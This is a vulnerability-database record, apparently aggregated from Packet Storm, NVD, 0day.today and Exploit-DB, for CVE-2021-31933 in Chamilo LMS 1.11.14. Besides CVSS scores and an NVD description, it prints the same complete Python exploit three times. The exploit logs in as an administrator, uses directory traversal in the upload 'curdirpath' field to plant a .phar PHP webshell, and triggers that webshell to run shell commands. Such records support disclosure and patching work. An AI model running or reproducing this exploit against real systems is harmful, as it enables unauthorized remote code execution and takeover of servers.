{"id": "PACKETSTORM:162572", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Chamilo LMS 1.11.14 Remote Code Execution", "description": "", "published": "2021-05-14T00:00:00", "modified": "2021-05-14T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://packetstormsecurity.com/files/162572/Chamilo-LMS-1.11.14-Remote-Code-Execution.html", "reporter": "M. Cory Billington", "references": [], "cvelist": ["CVE-2021-31933"], "immutableFields": [], "lastseen": "2021-05-14T13:57:07", "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-31933"]}, {"type": "exploitdb", "idList": ["EDB-ID:49867"]}, {"type": "zdt", "idList": ["1337DAY-ID-36246"]}], "rev": 4}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-31933"]}, {"type": "exploitdb", "idList": ["EDB-ID:49867"]}, {"type": "zdt", "idList": ["1337DAY-ID-36246"]}]}, "exploitation": null, "vulnersScore": 6.9}, "sourceHref": "https://packetstormsecurity.com/files/download/162572/chamilolms11114-exec.txt", "sourceData": "`# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated) \n# Date: 13/05/2021 \n# Exploit Author: M. Cory Billington (@_th3y) \n# Vendor Homepage: https://chamilo.org \n# Software Link: https://github.com/chamilo/chamilo-lms \n# Version: 1.11.14 \n# Tested on: Ubuntu 20.04.2 LTS \n# CVE: CVE-2021-31933 \n# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/ \n \nfrom requests import Session \nfrom random import choice \nfrom string import ascii_lowercase \n \nimport requests \n \n# This is all configuration stuff, \nurl = \"http://127.0.0.1/chamilo-lms/\" # URL to remote host web root \nuser_name = \"admin\" # User must be an administrator \npassword = \"admin\" \ncommand = \"id;whoami\" \n \n# Where you want to upload your webshell. Must be writable by web server user. 
\n# This spot isn't protected by .htaccess \nwebshell_path = 'web/' \nwebshell_name = f\"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar\" # Just a random name for webshell file \ncontent = f\"<?php echo `{command}`; ?>\" \n \ndef main(): \n# Run a context manager with a session object to hold login session after login \nwith Session() as s: \nlogin_url = f\"{url}index.php\" \nlogin_data = { \n\"login\": user_name, \n\"password\": password \n} \nr = s.post(login_url, data=login_data) # login request \n \n# Check to see if login as admin user was successful. \nif \"admin\" not in r.url: \nprint(f\"[-] Login as {user_name} failed. Need to be admin\") \nreturn \nprint(f\"[+] Logged in as {user_name}\") \nprint(f\"[+] Cookie: {s.cookies}\") \nfile_upload_url = f\"{url}main/upload/upload.php\" \n# The 'curdirpath' is not sanitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well \nphp_webshell_file = { \n\"curdirpath\": (None, f\"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}\"), \n\"user_upload\": (webshell_name, content) \n} \n \n## Good command if you want to see what the request looks like without sending \n# print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii')) \n \n# Two requests required to actually upload the file \nfor i in range(2): \ns.post(file_upload_url, files=php_webshell_file) \n \nexploit_request_url = f\"{url}{webshell_path}{webshell_name}\" \nprint(\"[+] Upload complete!\") \nprint(f\"[+] Webshell: {exploit_request_url}\") \n \n# This is a GET request to the new webshell to trigger code execution \ncommand_output = s.get(exploit_request_url) \nprint(\"[+] Command output:\\n\") \nprint(command_output.text) \n \n \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645899213}}
{"cve": [{"lastseen": "2022-03-23T18:14:01", "description": "A remote code execution vulnerability exists in Chamilo through 1.11.14 due to improper input sanitization of a parameter used for file uploads, and improper file-extension filtering for certain filenames (e.g., .phar or .pht). A remote authenticated administrator is able to upload a file containing arbitrary PHP code into specific directories via main/inc/lib/fileUpload.lib.php directory traversal to achieve PHP code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-30T21:15:00", "type": "cve", "title": "CVE-2021-31933", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31933"], "modified": "2021-05-17T20:15:00", "cpe": ["cpe:/a:chamilo:chamilo:1.11.14"], "id": "CVE-2021-31933", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31933", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:chamilo:chamilo:1.11.14:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2021-11-08T14:24:09", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": 
{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-14T00:00:00", "type": "zdt", "title": "Chamilo LMS 1.11.14 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31933"], "modified": "2021-05-14T00:00:00", "id": "1337DAY-ID-36246", "href": "https://0day.today/exploit/description/36246", "sourceData": "# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)\n# Exploit Author: M. Cory Billington (@_th3y)\n# Vendor Homepage: https://chamilo.org\n# Software Link: https://github.com/chamilo/chamilo-lms\n# Version: 1.11.14\n# Tested on: Ubuntu 20.04.2 LTS\n# CVE: CVE-2021-31933\n# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/\n\nfrom requests import Session\nfrom random import choice\nfrom string import ascii_lowercase\n\nimport requests\n\n# This is all configuration stuff, \nurl = \"http://127.0.0.1/chamilo-lms/\" # URL to remote host web root\nuser_name = \"admin\" # User must be an administrator\npassword = \"admin\"\ncommand = \"id;whoami\"\n\n# Where you want to upload your webshell. 
Must be writable by web server user.\n# This spot isn't protected by .htaccess\nwebshell_path = 'web/' \nwebshell_name = f\"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar\" # Just a random name for webshell file\ncontent = f\"<?php echo `{command}`; ?>\" \n\ndef main():\n # Run a context manager with a session object to hold login session after login\n with Session() as s:\n login_url = f\"{url}index.php\"\n login_data = {\n \"login\": user_name,\n \"password\": password\n }\n r = s.post(login_url, data=login_data) # login request\n\n # Check to see if login as admin user was successful.\n if \"admin\" not in r.url:\n print(f\"[-] Login as {user_name} failed. Need to be admin\")\n return\n print(f\"[+] Logged in as {user_name}\")\n print(f\"[+] Cookie: {s.cookies}\")\n file_upload_url = f\"{url}main/upload/upload.php\"\n # The 'curdirpath' is not sanitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well\n php_webshell_file = {\n \"curdirpath\": (None, f\"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}\"),\n \"user_upload\": (webshell_name, content)\n }\n \n ## Good command if you want to see what the request looks like without sending\n # print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))\n\n # Two requests required to actually upload the file\n for i in range(2):\n s.post(file_upload_url, files=php_webshell_file)\n\n exploit_request_url = f\"{url}{webshell_path}{webshell_name}\"\n print(\"[+] Upload complete!\")\n print(f\"[+] Webshell: {exploit_request_url}\")\n\n # This is a GET request to the new webshell to trigger code execution\n command_output = s.get(exploit_request_url)\n print(\"[+] Command output:\\n\")\n print(command_output.text)\n\n\n\nif __name__ == \"__main__\":\n main()\n", "sourceHref": "https://0day.today/exploit/36246", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": 
[{"lastseen": "2022-05-13T17:38:06", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-14T00:00:00", "type": "exploitdb", "title": "Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-31933", "CVE-2021-31933"], "modified": "2021-05-14T00:00:00", "id": "EDB-ID:49867", "href": "https://www.exploit-db.com/exploits/49867", "sourceData": "# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)\r\n# Date: 13/05/2021\r\n# Exploit Author: M. 
Cory Billington (@_th3y)\r\n# Vendor Homepage: https://chamilo.org\r\n# Software Link: https://github.com/chamilo/chamilo-lms\r\n# Version: 1.11.14\r\n# Tested on: Ubuntu 20.04.2 LTS\r\n# CVE: CVE-2021-31933\r\n# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/\r\n\r\nfrom requests import Session\r\nfrom random import choice\r\nfrom string import ascii_lowercase\r\n\r\nimport requests\r\n\r\n# This is all configuration stuff, \r\nurl = \"http://127.0.0.1/chamilo-lms/\" # URL to remote host web root\r\nuser_name = \"admin\" # User must be an administrator\r\npassword = \"admin\"\r\ncommand = \"id;whoami\"\r\n\r\n# Where you want to upload your webshell. Must be writable by web server user.\r\n# This spot isn't protected by .htaccess\r\nwebshell_path = 'web/' \r\nwebshell_name = f\"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar\" # Just a random name for webshell file\r\ncontent = f\"<?php echo `{command}`; ?>\" \r\n\r\ndef main():\r\n # Run a context manager with a session object to hold login session after login\r\n with Session() as s:\r\n login_url = f\"{url}index.php\"\r\n login_data = {\r\n \"login\": user_name,\r\n \"password\": password\r\n }\r\n r = s.post(login_url, data=login_data) # login request\r\n\r\n # Check to see if login as admin user was successful.\r\n if \"admin\" not in r.url:\r\n print(f\"[-] Login as {user_name} failed. Need to be admin\")\r\n return\r\n print(f\"[+] Logged in as {user_name}\")\r\n print(f\"[+] Cookie: {s.cookies}\")\r\n file_upload_url = f\"{url}main/upload/upload.php\"\r\n # The 'curdirpath' is not sanitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. 
I can upload to /tmp/ as well\r\n php_webshell_file = {\r\n \"curdirpath\": (None, f\"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}\"),\r\n \"user_upload\": (webshell_name, content)\r\n }\r\n \r\n ## Good command if you want to see what the request looks like without sending\r\n # print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))\r\n\r\n # Two requests required to actually upload the file\r\n for i in range(2):\r\n s.post(file_upload_url, files=php_webshell_file)\r\n\r\n exploit_request_url = f\"{url}{webshell_path}{webshell_name}\"\r\n print(\"[+] Upload complete!\")\r\n print(f\"[+] Webshell: {exploit_request_url}\")\r\n\r\n # This is a GET request to the new webshell to trigger code execution\r\n command_output = s.get(exploit_request_url)\r\n print(\"[+] Command output:\\n\")\r\n print(command_output.text)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()", "sourceHref": "https://www.exploit-db.com/download/49867", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}